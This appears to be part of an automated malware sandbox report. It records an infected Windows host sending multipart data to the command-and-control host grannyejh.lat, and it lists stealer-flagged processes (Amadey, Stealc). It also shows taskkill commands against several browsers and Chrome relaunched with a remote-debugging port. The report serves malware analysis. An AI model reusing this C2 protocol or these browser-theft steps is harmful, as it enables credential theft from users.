2024-12-19 09:15:58 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HNCNRXDL0C User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19915 Host: grannyejh.lat
2024-12-19 09:15:58 UTC	15331	OUT	Data Raw: 2d 2d 48 4e 43 4e 52 58 44 4c 30 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 4e 43 4e 52 58 44 4c 30 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 4e 43 4e 52 58 44 4c 30 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 48 4e 43 4e 52 58 44 4c 30 43 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --HNCNRXDL0CContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--HNCNRXDL0CContent-Disposition: form-data; name="pid"3--HNCNRXDL0CContent-Disposition: form-data; name="lid"PsFKDg--pablo--HNCNRXDL0CContent-
2024-12-19 09:15:58 UTC	4584	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf Data Ascii: 2+?2+?o?Mp5p_oI
2024-12-19 09:16:12 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:16:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kmamdvtlq56jesv46grk9vuro1; expires=Mon, 14 Apr 2025 03:02:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4LD%2B%2BpD0S2Pbu5G6gZ0EJfwXHo5vQNs0%2B%2BqRaQOLH0LfhpO8Gk7%2BWmpkxXp4ORb3cmTQ%2FsgMOyD8Vy5GKEOIWtpxCBvyLJNepA3J%2BI%2FdGqXLHa9i31aEd0os5TPHc6oL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464a8e38a2184d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1506&rtt_var=638&sent=15&recv=22&lost=0&retrans=0&sent_bytes=2831&recv_bytes=20866&delivery_rate=1938911&cwnd=238&unsent_bytes=0&cid=e5282adff9b0f618&ts=13950&x=0"
2024-12-19 09:16:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:16:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.6	50453	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:16:14 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TEVHNFF0D1G71UF2PS6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1295 Host: grannyejh.lat
2024-12-19 09:16:14 UTC	1295	OUT	Data Raw: 2d 2d 54 45 56 48 4e 46 46 30 44 31 47 37 31 55 46 32 50 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 45 56 48 4e 46 46 30 44 31 47 37 31 55 46 32 50 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 45 56 48 4e 46 46 30 44 31 47 37 31 55 46 32 50 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 Data Ascii: --TEVHNFF0D1G71UF2PS6Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--TEVHNFF0D1G71UF2PS6Content-Disposition: form-data; name="pid"1--TEVHNFF0D1G71UF2PS6Content-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-19 09:16:27 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:16:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1mhef12j93qo6nmremh3oo5cim; expires=Mon, 14 Apr 2025 03:02:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=weMlrtOOMcBrNtYFoN3EZYlYjWyyjod3ZZMshH3%2F%2BgG8LVS3m5IwJjWNXH%2BJwNyLfg7DcBlw%2B7p%2Bso8mfkzQYrVHY94dINmoM6uvdiMNTMaqgDxXpv%2F8jmGihCRqmVO1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464aed5c7ec325-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1590&rtt_var=616&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2210&delivery_rate=1749550&cwnd=252&unsent_bytes=0&cid=a06566f475784bab&ts=13490&x=0"
2024-12-19 09:16:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:16:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.6	50459	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:16:28 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RGKMGCHC5P2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29529 Host: grannyejh.lat
2024-12-19 09:16:28 UTC	15331	OUT	Data Raw: 2d 2d 52 47 4b 4d 47 43 48 43 35 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 47 4b 4d 47 43 48 43 35 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 47 4b 4d 47 43 48 43 35 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 52 47 4b 4d 47 43 48 43 35 50 32 0d 0a 43 6f 6e 74 Data Ascii: --RGKMGCHC5P2Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--RGKMGCHC5P2Content-Disposition: form-data; name="pid"1--RGKMGCHC5P2Content-Disposition: form-data; name="lid"PsFKDg--pablo--RGKMGCHC5P2Cont
2024-12-19 09:16:28 UTC	14198	OUT	Data Raw: 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 cc 8f f2 84 31 cb 5f 31 6d fe 58 5d 72 1b 54 9a b4 da cf af 82 Data Ascii: 73$\|)PQKnm7>5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom;z/o^R=ZHMyd01_1mX]rT
2024-12-19 09:16:43 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:16:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4c04fflejeab4sqovb9hh6mqsu; expires=Mon, 14 Apr 2025 03:03:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IL6n0ViEoYXyK0GusX18rEm7sn5xe3W3RMorR84t%2FawxmnqNXYuM%2FQpgAvcSJGGN7vWJfDTbgukLffWbw3sMQr5piMBvaN1%2FoJKn1GK8bBlQVUj1j71szOfc7tjQr%2F9s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464b49fcb68c63-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1806&rtt_var=699&sent=18&recv=35&lost=0&retrans=0&sent_bytes=2829&recv_bytes=30503&delivery_rate=1541710&cwnd=226&unsent_bytes=0&cid=154492a33a2c6d22&ts=14146&x=0"
2024-12-19 09:16:43 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:16:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.6	50466	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:16:44 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: grannyejh.lat
2024-12-19 09:16:44 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=86648A4BEF1E4DA3AC8923850305D13E
2024-12-19 09:16:58 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:16:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rnk73vrblj5vmins0n66h9f4s9; expires=Mon, 14 Apr 2025 03:03:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQ6amZCKsihrXJ5jUoLEZ3%2BPYLRWU0qwDB%2FVpmI3xqw4qlgoOFCef9t6PZpHImxCAc%2F9lyPYAFO1i%2FN%2F2IO6nWmEtsmsrPSO6aZhLfDVbDj9BD0ciDsQb%2F%2FLTggF%2BZXj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464baa9950f797-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1505&rtt_var=570&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=979&delivery_rate=1910994&cwnd=161&unsent_bytes=0&cid=19557fe0e93e3e53&ts=14197&x=0"
2024-12-19 09:16:58 UTC	214	IN	Data Raw: 64 30 0d 0a 37 4d 66 47 57 78 2f 39 79 43 55 54 77 59 45 72 50 67 56 2f 42 68 72 4e 37 57 72 6e 4a 6e 39 45 73 41 41 6e 4b 6e 58 33 75 71 57 33 76 4f 51 75 50 63 66 71 54 57 65 31 38 52 46 69 4b 69 4d 70 4b 2f 58 59 52 4e 55 58 53 6d 71 42 4d 52 51 45 52 4d 48 6d 69 6f 4f 68 6f 41 63 77 6d 61 31 44 50 61 54 35 54 68 77 70 58 57 42 75 37 39 64 61 79 77 51 61 5a 6f 6f 77 57 67 59 4f 31 63 2b 48 31 75 57 75 4c 32 75 4e 38 6e 6b 38 6e 61 34 61 42 6a 42 52 4e 43 76 34 77 31 76 57 46 56 46 31 68 6c 77 49 57 51 47 53 32 38 69 77 36 4c 51 36 63 5a 6d 6e 53 44 32 6b 2b 55 34 63 4b 56 31 67 62 75 2f 58 57 73 73 45 47 6d 61 4b 4d 46 70 33 0d 0a Data Ascii: d07MfGWx/9yCUTwYErPgV/BhrN7WrnJn9EsAAnKnX3uqW3vOQuPcfqTWe18RFiKiMpK/XYRNUXSmqBMRQERMHmioOhoAcwma1DPaT5ThwpXWBu79daywQaZoowWgYO1c+H1uWuL2uN8nk8na4aBjBRNCv4w1vWFVF1hlwIWQGS28iw6LQ6cZmnSD2k+U4cKV1gbu/XWssEGmaKMFp3
2024-12-19 09:16:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	04:08:57
Start date:	19/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xea0000
File size:	3'032'576 bytes
MD5 hash:	7944EBE231D464C760A818B34A636CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2133034325.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:08:59
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x120000
File size:	3'032'576 bytes
MD5 hash:	7944EBE231D464C760A818B34A636CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2163751236.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:09:00
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x120000
File size:	3'032'576 bytes
MD5 hash:	7944EBE231D464C760A818B34A636CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2165469048.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:10:00
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x120000
File size:	3'032'576 bytes
MD5 hash:	7944EBE231D464C760A818B34A636CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2761888853.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	04:10:13
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe"
Imagebase:	0x660000
File size:	1'801'728 bytes
MD5 hash:	8E89923EFBAC42F80F4E7FC0DC7AAE45
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:10:23
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe"
Imagebase:	0x5d0000
File size:	2'928'640 bytes
MD5 hash:	5081EA72759BA0DEA91A56403FF62DC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000009.00000002.3659341926.00000000005D1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000009.00000002.3670040217.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000009.00000003.2997018123.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	04:10:25
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe"
Imagebase:	0x660000
File size:	1'801'728 bytes
MD5 hash:	8E89923EFBAC42F80F4E7FC0DC7AAE45
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:10:31
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe"
Imagebase:	0xbf0000
File size:	967'680 bytes
MD5 hash:	629A3EAF01FB818CD0B1964E454BA39B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:10:32
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xab0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:10:32
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:10:34
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe"
Imagebase:	0x660000
File size:	1'801'728 bytes
MD5 hash:	8E89923EFBAC42F80F4E7FC0DC7AAE45
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3893497573.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3894979273.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	04:10:34
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0xab0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:10:34
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:10:34
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0xab0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:10:34
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:10:35
Start date:	19/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:10:35
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0xab0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:10:35
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:10:35
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0xab0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	04:10:35
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true
